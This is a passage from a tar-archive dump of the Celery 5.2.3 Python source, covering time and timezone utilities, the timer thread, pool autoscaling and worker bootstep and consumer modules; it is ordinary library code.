_FastLocalStack else: # pragma: no cover # - See #706 # since each thread has its own greenlet we can just use those as # identifiers for the context. If greenlets aren't available we # fall back to the current thread ident. LocalStack = _LocalStack ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/time.py0000664000175000017500000003012400000000000016630 0ustar00asifasif00000000000000"""Utilities related to dates, times, intervals, and timezones.""" import numbers import os import random import time as _time from calendar import monthrange from datetime import date, datetime, timedelta, tzinfo from kombu.utils.functional import reprcall from kombu.utils.objects import cached_property from pytz import AmbiguousTimeError, FixedOffset from pytz import timezone as _timezone from pytz import utc from .functional import dictfilter from .iso8601 import parse_iso8601 from .text import pluralize __all__ = ( 'LocalTimezone', 'timezone', 'maybe_timedelta', 'delta_resolution', 'remaining', 'rate', 'weekday', 'humanize_seconds', 'maybe_iso8601', 'is_naive', 'make_aware', 'localize', 'to_utc', 'maybe_make_aware', 'ffwd', 'utcoffset', 'adjust_timestamp', 'get_exponential_backoff_interval', ) C_REMDEBUG = os.environ.get('C_REMDEBUG', False) DAYNAMES = 'sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat' WEEKDAYS = dict(zip(DAYNAMES, range(7))) RATE_MODIFIER_MAP = { 's': lambda n: n, 'm': lambda n: n / 60.0, 'h': lambda n: n / 60.0 / 60.0, } TIME_UNITS = ( ('day', 60 * 60 * 24.0, lambda n: format(n, '.2f')), ('hour', 60 * 60.0, lambda n: format(n, '.2f')), ('minute', 60.0, lambda n: format(n, '.2f')), ('second', 1.0, lambda n: format(n, '.2f')), ) ZERO = timedelta(0) _local_timezone = None class LocalTimezone(tzinfo): """Local time implementation. Note: Used only when the :setting:`enable_utc` setting is disabled. 
""" _offset_cache = {} def __init__(self): # This code is moved in __init__ to execute it as late as possible # See get_default_timezone(). self.STDOFFSET = timedelta(seconds=-_time.timezone) if _time.daylight: self.DSTOFFSET = timedelta(seconds=-_time.altzone) else: self.DSTOFFSET = self.STDOFFSET self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET super().__init__() def __repr__(self): return f'' def utcoffset(self, dt): return self.DSTOFFSET if self._isdst(dt) else self.STDOFFSET def dst(self, dt): return self.DSTDIFF if self._isdst(dt) else ZERO def tzname(self, dt): return _time.tzname[self._isdst(dt)] def fromutc(self, dt): # The base tzinfo class no longer implements a DST # offset aware .fromutc() in Python 3 (Issue #2306). # I'd rather rely on pytz to do this, than port # the C code from cpython's fromutc [asksol] offset = int(self.utcoffset(dt).seconds / 60.0) try: tz = self._offset_cache[offset] except KeyError: tz = self._offset_cache[offset] = FixedOffset(offset) return tz.fromutc(dt.replace(tzinfo=tz)) def _isdst(self, dt): tt = (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.weekday(), 0, 0) stamp = _time.mktime(tt) tt = _time.localtime(stamp) return tt.tm_isdst > 0 class _Zone: def tz_or_local(self, tzinfo=None): # pylint: disable=redefined-outer-name if tzinfo is None: return self.local return self.get_timezone(tzinfo) def to_local(self, dt, local=None, orig=None): if is_naive(dt): dt = make_aware(dt, orig or self.utc) return localize(dt, self.tz_or_local(local)) def to_system(self, dt): # tz=None is a special case since Python 3.3, and will # convert to the current local timezone (Issue #2306). return dt.astimezone(tz=None) def to_local_fallback(self, dt): if is_naive(dt): return make_aware(dt, self.local) return localize(dt, self.local) def get_timezone(self, zone): if isinstance(zone, str): return _timezone(zone) return zone @cached_property def local(self): return LocalTimezone() @cached_property def utc(self): return self.get_timezone('UTC') timezone = _Zone() def maybe_timedelta(delta): """Convert integer to timedelta, if argument is an integer.""" if isinstance(delta, numbers.Real): return timedelta(seconds=delta) return delta def delta_resolution(dt, delta): """Round a :class:`~datetime.datetime` to the resolution of timedelta. If the :class:`~datetime.timedelta` is in days, the :class:`~datetime.datetime` will be rounded to the nearest days, if the :class:`~datetime.timedelta` is in hours the :class:`~datetime.datetime` will be rounded to the nearest hour, and so on until seconds, which will just return the original :class:`~datetime.datetime`. """ delta = max(delta.total_seconds(), 0) resolutions = ((3, lambda x: x / 86400), (4, lambda x: x / 3600), (5, lambda x: x / 60)) args = dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second for res, predicate in resolutions: if predicate(delta) >= 1.0: return datetime(*args[:res], tzinfo=dt.tzinfo) return dt def remaining(start, ends_in, now=None, relative=False): """Calculate the remaining time for a start date and a timedelta. For example, "how many seconds left for 30 seconds after start?" Arguments: start (~datetime.datetime): Starting date. ends_in (~datetime.timedelta): The end delta. relative (bool): If enabled the end time will be calculated using :func:`delta_resolution` (i.e., rounded to the resolution of `ends_in`). now (Callable): Function returning the current time and date. Defaults to :func:`datetime.utcnow`. Returns: ~datetime.timedelta: Remaining time. 
""" now = now or datetime.utcnow() if str(start.tzinfo) == str(now.tzinfo) and now.utcoffset() != start.utcoffset(): # DST started/ended start = start.replace(tzinfo=now.tzinfo) end_date = start + ends_in if relative: end_date = delta_resolution(end_date, ends_in).replace(microsecond=0) ret = end_date - now if C_REMDEBUG: # pragma: no cover print('rem: NOW:{!r} START:{!r} ENDS_IN:{!r} END_DATE:{} REM:{}'.format( now, start, ends_in, end_date, ret)) return ret def rate(r): """Convert rate string (`"100/m"`, `"2/h"` or `"0.5/s"`) to seconds.""" if r: if isinstance(r, str): ops, _, modifier = r.partition('/') return RATE_MODIFIER_MAP[modifier or 's'](float(ops)) or 0 return r or 0 return 0 def weekday(name): """Return the position of a weekday: 0 - 7, where 0 is Sunday. Example: >>> weekday('sunday'), weekday('sun'), weekday('mon') (0, 0, 1) """ abbreviation = name[0:3].lower() try: return WEEKDAYS[abbreviation] except KeyError: # Show original day name in exception, instead of abbr. raise KeyError(name) def humanize_seconds(secs, prefix='', sep='', now='now', microseconds=False): """Show seconds in human form. For example, 60 becomes "1 minute", and 7200 becomes "2 hours". Arguments: prefix (str): can be used to add a preposition to the output (e.g., 'in' will give 'in 1 second', but add nothing to 'now'). now (str): Literal 'now'. microseconds (bool): Include microseconds. """ secs = float(format(float(secs), '.2f')) for unit, divider, formatter in TIME_UNITS: if secs >= divider: w = secs / float(divider) return '{}{}{} {}'.format(prefix, sep, formatter(w), pluralize(w, unit)) if microseconds and secs > 0.0: return '{prefix}{sep}{0:.2f} seconds'.format( secs, sep=sep, prefix=prefix) return now def maybe_iso8601(dt): """Either ``datetime | str -> datetime`` or ``None -> None``.""" if not dt: return if isinstance(dt, datetime): return dt return parse_iso8601(dt) def is_naive(dt): """Return :const:`True` if :class:`~datetime.datetime` is naive.""" return dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None def make_aware(dt, tz): """Set timezone for a :class:`~datetime.datetime` object.""" try: _localize = tz.localize except AttributeError: return dt.replace(tzinfo=tz) else: # works on pytz timezones try: return _localize(dt, is_dst=None) except AmbiguousTimeError: return min(_localize(dt, is_dst=True), _localize(dt, is_dst=False)) def localize(dt, tz): """Convert aware :class:`~datetime.datetime` to another timezone.""" if is_naive(dt): # Ensure timezone aware datetime dt = make_aware(dt, tz) if dt.tzinfo == utc: dt = dt.astimezone(tz) # Always safe to call astimezone on utc zones try: _normalize = tz.normalize except AttributeError: # non-pytz tz return dt else: try: return _normalize(dt, is_dst=None) except TypeError: return _normalize(dt) except AmbiguousTimeError: return min(_normalize(dt, is_dst=True), _normalize(dt, is_dst=False)) def to_utc(dt): """Convert naive :class:`~datetime.datetime` to UTC.""" return make_aware(dt, timezone.utc) def maybe_make_aware(dt, tz=None): """Convert dt to aware datetime, do nothing if dt is already aware.""" if is_naive(dt): dt = to_utc(dt) return localize( dt, timezone.utc if tz is None else timezone.tz_or_local(tz), ) return dt class ffwd: """Version of ``dateutil.relativedelta`` that only supports addition.""" def __init__(self, year=None, month=None, weeks=0, weekday=None, day=None, hour=None, minute=None, second=None, microsecond=None, **kwargs): # pylint: disable=redefined-outer-name # weekday is also a function in outer scope. 
self.year = year self.month = month self.weeks = weeks self.weekday = weekday self.day = day self.hour = hour self.minute = minute self.second = second self.microsecond = microsecond self.days = weeks * 7 self._has_time = self.hour is not None or self.minute is not None def __repr__(self): return reprcall('ffwd', (), self._fields(weeks=self.weeks, weekday=self.weekday)) def __radd__(self, other): if not isinstance(other, date): return NotImplemented year = self.year or other.year month = self.month or other.month day = min(monthrange(year, month)[1], self.day or other.day) ret = other.replace(**dict(dictfilter(self._fields()), year=year, month=month, day=day)) if self.weekday is not None: ret += timedelta(days=(7 - ret.weekday() + self.weekday) % 7) return ret + timedelta(days=self.days) def _fields(self, **extra): return dictfilter({ 'year': self.year, 'month': self.month, 'day': self.day, 'hour': self.hour, 'minute': self.minute, 'second': self.second, 'microsecond': self.microsecond, }, **extra) def utcoffset(time=_time, localtime=_time.localtime): """Return the current offset to UTC in hours.""" if localtime().tm_isdst: return time.altzone // 3600 return time.timezone // 3600 def adjust_timestamp(ts, offset, here=utcoffset): """Adjust timestamp based on provided utcoffset.""" return ts - (offset - here()) * 3600 def get_exponential_backoff_interval( factor, retries, maximum, full_jitter=False ): """Calculate the exponential backoff wait time.""" # Will be zero if factor equals 0 countdown = min(maximum, factor * (2 ** retries)) # Full jitter according to # https://www.awsarchitectureblog.com/2015/03/backoff.html if full_jitter: countdown = random.randrange(countdown + 1) # Adjust according to maximum wait time and account for negative values. return max(0, countdown) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/timer2.py0000664000175000017500000001131500000000000017075 0ustar00asifasif00000000000000"""Scheduler for Python functions. .. note:: This is used for the thread-based worker only, not for amqp/redis/sqs/qpid where :mod:`kombu.asynchronous.timer` is used. """ import os import sys import threading from itertools import count from threading import TIMEOUT_MAX as THREAD_TIMEOUT_MAX from time import sleep from kombu.asynchronous.timer import Entry from kombu.asynchronous.timer import Timer as Schedule from kombu.asynchronous.timer import logger, to_timestamp TIMER_DEBUG = os.environ.get('TIMER_DEBUG') __all__ = ('Entry', 'Schedule', 'Timer', 'to_timestamp') class Timer(threading.Thread): """Timer thread. Note: This is only used for transports not supporting AsyncIO. """ Entry = Entry Schedule = Schedule running = False on_tick = None _timer_count = count(1) if TIMER_DEBUG: # pragma: no cover def start(self, *args, **kwargs): import traceback print('- Timer starting') traceback.print_stack() super().start(*args, **kwargs) def __init__(self, schedule=None, on_error=None, on_tick=None, on_start=None, max_interval=None, **kwargs): self.schedule = schedule or self.Schedule(on_error=on_error, max_interval=max_interval) self.on_start = on_start self.on_tick = on_tick or self.on_tick super().__init__() # `_is_stopped` is likely to be an attribute on `Thread` objects so we # double underscore these names to avoid shadowing anything and # potentially getting confused by the superclass turning these into # something other than an `Event` instance (e.g. 
a `bool`) self.__is_shutdown = threading.Event() self.__is_stopped = threading.Event() self.mutex = threading.Lock() self.not_empty = threading.Condition(self.mutex) self.daemon = True self.name = f'Timer-{next(self._timer_count)}' def _next_entry(self): with self.not_empty: delay, entry = next(self.scheduler) if entry is None: if delay is None: self.not_empty.wait(1.0) return delay return self.schedule.apply_entry(entry) __next__ = next = _next_entry # for 2to3 def run(self): try: self.running = True self.scheduler = iter(self.schedule) while not self.__is_shutdown.is_set(): delay = self._next_entry() if delay: if self.on_tick: self.on_tick(delay) if sleep is None: # pragma: no cover break sleep(delay) try: self.__is_stopped.set() except TypeError: # pragma: no cover # we lost the race at interpreter shutdown, # so gc collected built-in modules. pass except Exception as exc: logger.error('Thread Timer crashed: %r', exc, exc_info=True) sys.stderr.flush() os._exit(1) def stop(self): self.__is_shutdown.set() if self.running: self.__is_stopped.wait() self.join(THREAD_TIMEOUT_MAX) self.running = False def ensure_started(self): if not self.running and not self.is_alive(): if self.on_start: self.on_start(self) self.start() def _do_enter(self, meth, *args, **kwargs): self.ensure_started() with self.mutex: entry = getattr(self.schedule, meth)(*args, **kwargs) self.not_empty.notify() return entry def enter(self, entry, eta, priority=None): return self._do_enter('enter_at', entry, eta, priority=priority) def call_at(self, *args, **kwargs): return self._do_enter('call_at', *args, **kwargs) def enter_after(self, *args, **kwargs): return self._do_enter('enter_after', *args, **kwargs) def call_after(self, *args, **kwargs): return self._do_enter('call_after', *args, **kwargs) def call_repeatedly(self, *args, **kwargs): return self._do_enter('call_repeatedly', *args, **kwargs) def exit_after(self, secs, priority=10): self.call_after(secs, sys.exit, priority) def cancel(self, tref): tref.cancel() def clear(self): self.schedule.clear() def empty(self): return not len(self) def __len__(self): return len(self.schedule) def __bool__(self): """``bool(timer)``.""" return True __nonzero__ = __bool__ @property def queue(self): return self.schedule.queue ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5117517 celery-5.2.3/celery/worker/0000775000175000017500000000000000000000000015471 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/__init__.py0000664000175000017500000000013700000000000017603 0ustar00asifasif00000000000000"""Worker implementation.""" from .worker import WorkController __all__ = ('WorkController',) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/autoscale.py0000664000175000017500000001076100000000000020030 0ustar00asifasif00000000000000"""Pool Autoscaling. This module implements the internal thread responsible for growing and shrinking the pool according to the current autoscale settings. The autoscale thread is only enabled if the :option:`celery worker --autoscale` option is used. """ import os import threading from time import monotonic, sleep from kombu.asynchronous.semaphore import DummyLock from celery import bootsteps from celery.utils.log import get_logger from celery.utils.threads import bgThread from . 
import state from .components import Pool __all__ = ('Autoscaler', 'WorkerComponent') logger = get_logger(__name__) debug, info, error = logger.debug, logger.info, logger.error AUTOSCALE_KEEPALIVE = float(os.environ.get('AUTOSCALE_KEEPALIVE', 30)) class WorkerComponent(bootsteps.StartStopStep): """Bootstep that starts the autoscaler thread/timer in the worker.""" label = 'Autoscaler' conditional = True requires = (Pool,) def __init__(self, w, **kwargs): self.enabled = w.autoscale w.autoscaler = None def create(self, w): scaler = w.autoscaler = self.instantiate( w.autoscaler_cls, w.pool, w.max_concurrency, w.min_concurrency, worker=w, mutex=DummyLock() if w.use_eventloop else None, ) return scaler if not w.use_eventloop else None def register_with_event_loop(self, w, hub): w.consumer.on_task_message.add(w.autoscaler.maybe_scale) hub.call_repeatedly( w.autoscaler.keepalive, w.autoscaler.maybe_scale, ) def info(self, w): """Return `Autoscaler` info.""" return {'autoscaler': w.autoscaler.info()} class Autoscaler(bgThread): """Background thread to autoscale pool workers.""" def __init__(self, pool, max_concurrency, min_concurrency=0, worker=None, keepalive=AUTOSCALE_KEEPALIVE, mutex=None): super().__init__() self.pool = pool self.mutex = mutex or threading.Lock() self.max_concurrency = max_concurrency self.min_concurrency = min_concurrency self.keepalive = keepalive self._last_scale_up = None self.worker = worker assert self.keepalive, 'cannot scale down too fast.' def body(self): with self.mutex: self.maybe_scale() sleep(1.0) def _maybe_scale(self, req=None): procs = self.processes cur = min(self.qty, self.max_concurrency) if cur > procs: self.scale_up(cur - procs) return True cur = max(self.qty, self.min_concurrency) if cur < procs: self.scale_down(procs - cur) return True def maybe_scale(self, req=None): if self._maybe_scale(req): self.pool.maintain_pool() def update(self, max=None, min=None): with self.mutex: if max is not None: if max < self.processes: self._shrink(self.processes - max) self._update_consumer_prefetch_count(max) self.max_concurrency = max if min is not None: if min > self.processes: self._grow(min - self.processes) self.min_concurrency = min return self.max_concurrency, self.min_concurrency def scale_up(self, n): self._last_scale_up = monotonic() return self._grow(n) def scale_down(self, n): if self._last_scale_up and ( monotonic() - self._last_scale_up > self.keepalive): return self._shrink(n) def _grow(self, n): info('Scaling up %s processes.', n) self.pool.grow(n) def _shrink(self, n): info('Scaling down %s processes.', n) try: self.pool.shrink(n) except ValueError: debug("Autoscaler won't scale down: all processes busy.") except Exception as exc: error('Autoscaler: scale_down: %r', exc, exc_info=True) def _update_consumer_prefetch_count(self, new_max): diff = new_max - self.max_concurrency if diff: self.worker.consumer._update_prefetch_count( diff ) def info(self): return { 'max': self.max_concurrency, 'min': self.min_concurrency, 'current': self.processes, 'qty': self.qty, } @property def qty(self): return len(state.reserved_requests) @property def processes(self): return self.pool.num_processes ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/components.py0000664000175000017500000001653500000000000020242 0ustar00asifasif00000000000000"""Worker-level Bootsteps.""" import atexit import warnings from kombu.asynchronous import Hub as _Hub from kombu.asynchronous import get_event_loop, 
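# Illustrative sketch (not part of this module): the decision rule used by
# ``Autoscaler._maybe_scale()`` above, reduced to a pure function.  ``qty``
# is the number of reserved requests, ``procs`` the current pool size.
def plan_scaling(qty, procs, max_concurrency, min_concurrency):
    target = min(qty, max_concurrency)
    if target > procs:
        return ('grow', target - procs)
    target = max(qty, min_concurrency)
    if target < procs:
        # the real class only shrinks once ``keepalive`` seconds have
        # passed since the last scale-up
        return ('shrink', procs - target)
    return None

assert plan_scaling(qty=12, procs=3, max_concurrency=10, min_concurrency=3) == ('grow', 7)
assert plan_scaling(qty=0, procs=10, max_concurrency=10, min_concurrency=3) == ('shrink', 7)
assert plan_scaling(qty=5, procs=5, max_concurrency=10, min_concurrency=3) is None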
set_event_loop from kombu.asynchronous.semaphore import DummyLock, LaxBoundedSemaphore from kombu.asynchronous.timer import Timer as _Timer from celery import bootsteps from celery._state import _set_task_join_will_block from celery.exceptions import ImproperlyConfigured from celery.platforms import IS_WINDOWS from celery.utils.log import worker_logger as logger __all__ = ('Timer', 'Hub', 'Pool', 'Beat', 'StateDB', 'Consumer') GREEN_POOLS = {'eventlet', 'gevent'} ERR_B_GREEN = """\ -B option doesn't work with eventlet/gevent pools: \ use standalone beat instead.\ """ W_POOL_SETTING = """ The worker_pool setting shouldn't be used to select the eventlet/gevent pools, instead you *must use the -P* argument so that patches are applied as early as possible. """ class Timer(bootsteps.Step): """Timer bootstep.""" def create(self, w): if w.use_eventloop: # does not use dedicated timer thread. w.timer = _Timer(max_interval=10.0) else: if not w.timer_cls: # Default Timer is set by the pool, as for example, the # eventlet pool needs a custom timer implementation. w.timer_cls = w.pool_cls.Timer w.timer = self.instantiate(w.timer_cls, max_interval=w.timer_precision, on_error=self.on_timer_error, on_tick=self.on_timer_tick) def on_timer_error(self, exc): logger.error('Timer error: %r', exc, exc_info=True) def on_timer_tick(self, delay): logger.debug('Timer wake-up! Next ETA %s secs.', delay) class Hub(bootsteps.StartStopStep): """Worker starts the event loop.""" requires = (Timer,) def __init__(self, w, **kwargs): w.hub = None super().__init__(w, **kwargs) def include_if(self, w): return w.use_eventloop def create(self, w): w.hub = get_event_loop() if w.hub is None: required_hub = getattr(w._conninfo, 'requires_hub', None) w.hub = set_event_loop(( required_hub if required_hub else _Hub)(w.timer)) self._patch_thread_primitives(w) return self def start(self, w): pass def stop(self, w): w.hub.close() def terminate(self, w): w.hub.close() def _patch_thread_primitives(self, w): # make clock use dummy lock w.app.clock.mutex = DummyLock() # multiprocessing's ApplyResult uses this lock. try: from billiard import pool except ImportError: # pragma: no cover pass else: pool.Lock = DummyLock class Pool(bootsteps.StartStopStep): """Bootstep managing the worker pool. Describes how to initialize the worker pool, and starts and stops the pool during worker start-up/shutdown. 
Adds attributes: * autoscale * pool * max_concurrency * min_concurrency """ requires = (Hub,) def __init__(self, w, autoscale=None, **kwargs): w.pool = None w.max_concurrency = None w.min_concurrency = w.concurrency self.optimization = w.optimization if isinstance(autoscale, str): max_c, _, min_c = autoscale.partition(',') autoscale = [int(max_c), min_c and int(min_c) or 0] w.autoscale = autoscale if w.autoscale: w.max_concurrency, w.min_concurrency = w.autoscale super().__init__(w, **kwargs) def close(self, w): if w.pool: w.pool.close() def terminate(self, w): if w.pool: w.pool.terminate() def create(self, w): semaphore = None max_restarts = None if w.app.conf.worker_pool in GREEN_POOLS: # pragma: no cover warnings.warn(UserWarning(W_POOL_SETTING)) threaded = not w.use_eventloop or IS_WINDOWS procs = w.min_concurrency w.process_task = w._process_task if not threaded: semaphore = w.semaphore = LaxBoundedSemaphore(procs) w._quick_acquire = w.semaphore.acquire w._quick_release = w.semaphore.release max_restarts = 100 if w.pool_putlocks and w.pool_cls.uses_semaphore: w.process_task = w._process_task_sem allow_restart = w.pool_restarts pool = w.pool = self.instantiate( w.pool_cls, w.min_concurrency, initargs=(w.app, w.hostname), maxtasksperchild=w.max_tasks_per_child, max_memory_per_child=w.max_memory_per_child, timeout=w.time_limit, soft_timeout=w.soft_time_limit, putlocks=w.pool_putlocks and threaded, lost_worker_timeout=w.worker_lost_wait, threads=threaded, max_restarts=max_restarts, allow_restart=allow_restart, forking_enable=True, semaphore=semaphore, sched_strategy=self.optimization, app=w.app, ) _set_task_join_will_block(pool.task_join_will_block) return pool def info(self, w): return {'pool': w.pool.info if w.pool else 'N/A'} def register_with_event_loop(self, w, hub): w.pool.register_with_event_loop(hub) class Beat(bootsteps.StartStopStep): """Step used to embed a beat process. Enabled when the ``beat`` argument is set. 
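# Illustrative sketch (not part of this module): how the ``--autoscale``
# option string handled by ``Pool.__init__`` above is interpreted, and how
# the Consumer bootstep that follows derives the initial prefetch count.
# The ``prefetch_multiplier`` value is an example (the setting defaults to 4).
def parse_autoscale(option):
    max_c, _, min_c = option.partition(',')
    return int(max_c), int(min_c) if min_c else 0

max_concurrency, min_concurrency = parse_autoscale('10,3')               # (10, 3)
prefetch_multiplier = 4
initial_prefetch_count = max(max_concurrency, 1) * prefetch_multiplier   # 40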
""" label = 'Beat' conditional = True def __init__(self, w, beat=False, **kwargs): self.enabled = w.beat = beat w.beat = None super().__init__(w, beat=beat, **kwargs) def create(self, w): from celery.beat import EmbeddedService if w.pool_cls.__module__.endswith(('gevent', 'eventlet')): raise ImproperlyConfigured(ERR_B_GREEN) b = w.beat = EmbeddedService(w.app, schedule_filename=w.schedule_filename, scheduler_cls=w.scheduler) return b class StateDB(bootsteps.Step): """Bootstep that sets up between-restart state database file.""" def __init__(self, w, **kwargs): self.enabled = w.statedb w._persistence = None super().__init__(w, **kwargs) def create(self, w): w._persistence = w.state.Persistent(w.state, w.statedb, w.app.clock) atexit.register(w._persistence.save) class Consumer(bootsteps.StartStopStep): """Bootstep starting the Consumer blueprint.""" last = True def create(self, w): if w.max_concurrency: prefetch_count = max(w.max_concurrency, 1) * w.prefetch_multiplier else: prefetch_count = w.concurrency * w.prefetch_multiplier c = w.consumer = self.instantiate( w.consumer_cls, w.process_task, hostname=w.hostname, task_events=w.task_events, init_callback=w.ready_callback, initial_prefetch_count=prefetch_count, pool=w.pool, timer=w.timer, app=w.app, controller=w, hub=w.hub, worker_options=w.options, disable_rate_limits=w.disable_rate_limits, prefetch_multiplier=w.prefetch_multiplier, ) return c ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.523752 celery-5.2.3/celery/worker/consumer/0000775000175000017500000000000000000000000017324 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/__init__.py0000664000175000017500000000060700000000000021440 0ustar00asifasif00000000000000"""Worker consumer.""" from .agent import Agent from .connection import Connection from .consumer import Consumer from .control import Control from .events import Events from .gossip import Gossip from .heart import Heart from .mingle import Mingle from .tasks import Tasks __all__ = ( 'Consumer', 'Agent', 'Connection', 'Control', 'Events', 'Gossip', 'Heart', 'Mingle', 'Tasks', ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/agent.py0000664000175000017500000000101500000000000020771 0ustar00asifasif00000000000000"""Celery + :pypi:`cell` integration.""" from celery import bootsteps from .connection import Connection __all__ = ('Agent',) class Agent(bootsteps.StartStopStep): """Agent starts :pypi:`cell` actors.""" conditional = True requires = (Connection,) def __init__(self, c, **kwargs): self.agent_cls = self.enabled = c.app.conf.worker_agent super().__init__(c, **kwargs) def create(self, c): agent = c.agent = self.instantiate(self.agent_cls, c.connection) return agent ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/connection.py0000664000175000017500000000200200000000000022027 0ustar00asifasif00000000000000"""Consumer Broker Connection Bootstep.""" from kombu.common import ignore_errors from celery import bootsteps from celery.utils.log import get_logger __all__ = ('Connection',) logger = get_logger(__name__) info = logger.info class Connection(bootsteps.StartStopStep): """Service managing the consumer broker connection.""" def __init__(self, c, **kwargs): 
c.connection = None super().__init__(c, **kwargs) def start(self, c): c.connection = c.connect() info('Connected to %s', c.connection.as_uri()) def shutdown(self, c): # We must set self.connection to None here, so # that the green pidbox thread exits. connection, c.connection = c.connection, None if connection: ignore_errors(connection, connection.close) def info(self, c): params = 'N/A' if c.connection: params = c.connection.info() params.pop('password', None) # don't send password. return {'broker': params} ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/consumer/consumer.py0000664000175000017500000005436100000000000021542 0ustar00asifasif00000000000000"""Worker Consumer Blueprint. This module contains the components responsible for consuming messages from the broker, processing the messages and keeping the broker connections up and running. """ import errno import logging import os import warnings from collections import defaultdict from time import sleep from billiard.common import restart_state from billiard.exceptions import RestartFreqExceeded from kombu.asynchronous.semaphore import DummyLock from kombu.exceptions import ContentDisallowed, DecodeError from kombu.utils.compat import _detect_environment from kombu.utils.encoding import safe_repr from kombu.utils.limits import TokenBucket from vine import ppartial, promise from celery import bootsteps, signals from celery.app.trace import build_tracer from celery.exceptions import (CPendingDeprecationWarning, InvalidTaskError, NotRegistered) from celery.utils.functional import noop from celery.utils.log import get_logger from celery.utils.nodenames import gethostname from celery.utils.objects import Bunch from celery.utils.text import truncate from celery.utils.time import humanize_seconds, rate from celery.worker import loops from celery.worker.state import (active_requests, maybe_shutdown, reserved_requests, task_reserved) __all__ = ('Consumer', 'Evloop', 'dump_body') CLOSE = bootsteps.CLOSE TERMINATE = bootsteps.TERMINATE STOP_CONDITIONS = {CLOSE, TERMINATE} logger = get_logger(__name__) debug, info, warn, error, crit = (logger.debug, logger.info, logger.warning, logger.error, logger.critical) CONNECTION_RETRY = """\ consumer: Connection to broker lost. \ Trying to re-establish the connection...\ """ CONNECTION_RETRY_STEP = """\ Trying again {when}... ({retries}/{max_retries})\ """ CONNECTION_ERROR = """\ consumer: Cannot connect to %s: %s. %s """ CONNECTION_FAILOVER = """\ Will retry using next failover.\ """ UNKNOWN_FORMAT = """\ Received and deleted unknown message. Wrong destination?!? The full contents of the message body was: %s """ #: Error message for when an unregistered task is received. UNKNOWN_TASK_ERROR = """\ Received unregistered task of type %s. The message has been ignored and discarded. Did you remember to import the module containing this task? Or maybe you're using relative imports? Please see http://docs.celeryq.org/en/latest/internals/protocol.html for more information. The full contents of the message body was: %s """ #: Error message for when an invalid task message is received. INVALID_TASK_ERROR = """\ Received invalid task message: %s The message has been ignored and discarded. 
Please ensure your message conforms to the task message protocol as described here: http://docs.celeryq.org/en/latest/internals/protocol.html The full contents of the message body was: %s """ MESSAGE_DECODE_ERROR = """\ Can't decode message body: %r [type:%r encoding:%r headers:%s] body: %s """ MESSAGE_REPORT = """\ body: {0} {{content_type:{1} content_encoding:{2} delivery_info:{3} headers={4}}} """ TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS = """\ Task %s cannot be acknowledged after a connection loss since late acknowledgement is enabled for it. Terminating it instead. """ CANCEL_TASKS_BY_DEFAULT = """ In Celery 5.1 we introduced an optional breaking change which on connection loss cancels all currently executed tasks with late acknowledgement enabled. These tasks cannot be acknowledged as the connection is gone, and the tasks are automatically redelivered back to the queue. You can enable this behavior using the worker_cancel_long_running_tasks_on_connection_loss setting. In Celery 5.1 it is set to False by default. The setting will be set to True by default in Celery 6.0. """ # noqa: E501 def dump_body(m, body): """Format message body for debugging purposes.""" # v2 protocol does not deserialize body body = m.body if body is None else body return '{} ({}b)'.format(truncate(safe_repr(body), 1024), len(m.body)) class Consumer: """Consumer blueprint.""" Strategies = dict #: Optional callback called the first time the worker #: is ready to receive tasks. init_callback = None #: The current worker pool instance. pool = None #: A timer used for high-priority internal tasks, such #: as sending heartbeats. timer = None restart_count = -1 # first start is the same as a restart class Blueprint(bootsteps.Blueprint): """Consumer blueprint.""" name = 'Consumer' default_steps = [ 'celery.worker.consumer.connection:Connection', 'celery.worker.consumer.mingle:Mingle', 'celery.worker.consumer.events:Events', 'celery.worker.consumer.gossip:Gossip', 'celery.worker.consumer.heart:Heart', 'celery.worker.consumer.control:Control', 'celery.worker.consumer.tasks:Tasks', 'celery.worker.consumer.consumer:Evloop', 'celery.worker.consumer.agent:Agent', ] def shutdown(self, parent): self.send_all(parent, 'shutdown') def __init__(self, on_task_request, init_callback=noop, hostname=None, pool=None, app=None, timer=None, controller=None, hub=None, amqheartbeat=None, worker_options=None, disable_rate_limits=False, initial_prefetch_count=2, prefetch_multiplier=1, **kwargs): self.app = app self.controller = controller self.init_callback = init_callback self.hostname = hostname or gethostname() self.pid = os.getpid() self.pool = pool self.timer = timer self.strategies = self.Strategies() self.conninfo = self.app.connection_for_read() self.connection_errors = self.conninfo.connection_errors self.channel_errors = self.conninfo.channel_errors self._restart_state = restart_state(maxR=5, maxT=1) self._does_info = logger.isEnabledFor(logging.INFO) self._limit_order = 0 self.on_task_request = on_task_request self.on_task_message = set() self.amqheartbeat_rate = self.app.conf.broker_heartbeat_checkrate self.disable_rate_limits = disable_rate_limits self.initial_prefetch_count = initial_prefetch_count self.prefetch_multiplier = prefetch_multiplier # this contains a tokenbucket for each task type by name, used for # rate limits, or None if rate limits are disabled for that task. 
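# Illustrative sketch (not part of this module): the per-task rate limits
# mentioned in the comment above are backed by kombu's TokenBucket; the
# '10/m' rate-limit string is an example only.
from kombu.utils.limits import TokenBucket

from celery.utils.time import rate

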